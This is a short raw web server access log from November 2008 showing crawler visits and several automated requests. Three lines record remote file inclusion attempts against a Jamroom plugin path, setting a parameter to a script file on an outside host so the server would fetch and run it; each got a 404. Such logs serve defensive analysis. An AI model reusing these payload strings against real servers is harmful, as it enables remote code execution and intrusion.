64.1.215.162 - - [02/Nov/2008:06:13:43 -0800] "GET /logs/?D=A HTTP/1.0" 200 3073 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
64.1.215.162 - - [02/Nov/2008:06:24:43 -0800] "GET /?D=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [02/Nov/2008:06:58:08 -0800] "GET /tmp HTTP/1.1" 301 98 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
66.249.71.82 - - [02/Nov/2008:06:58:08 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.autobutlerlifts.com"
82.194.71.192 - - [02/Nov/2008:07:15:50 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.autobutlerlifts.com"
88.84.145.169 - - [02/Nov/2008:07:22:14 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.autobutlerlifts.com"
64.1.215.164 - - [02/Nov/2008:07:29:09 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "autobutlerlifts.com"
82.194.71.192 - - [02/Nov/2008:07:38:16 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.pnladistancia.com.ar/vnc/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.autobutlerlifts.com"
